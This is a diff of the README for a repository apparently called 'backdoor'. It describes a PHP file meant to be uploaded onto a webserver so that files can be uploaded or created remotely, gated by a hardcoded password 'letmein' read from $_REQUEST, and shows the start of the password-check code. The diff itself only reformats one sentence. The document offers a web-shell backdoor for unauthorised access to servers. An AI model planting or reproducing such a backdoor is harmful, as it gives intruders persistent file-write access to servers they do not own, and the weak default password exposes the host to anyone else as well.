AndrewChamp/backdoor/README.md

 Backdoor
 ========

 Upload onto a webserver to upload or create files.
-Just change the $key (password) to what you want.
+Just change the *$key* (aka password) to what you want.
 For the example it's set as "letmein".

 ```php
 $key = $_REQUEST['key'] == 'letmein' ? $_REQUEST['key'] : false;